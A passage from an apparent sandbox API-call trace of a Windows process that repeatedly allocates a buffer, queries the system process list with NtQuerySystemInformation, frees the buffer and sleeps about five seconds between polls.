BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.374] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.374] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.392] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.393] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.404] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.409] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.415] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.419] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.426] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.437] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.460] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.470] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.472] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.481] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.494] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.497] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.497] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.510] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.518] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.543] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.553] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.587] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.606] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0216.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0216.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0216.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0216.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0216.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0216.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 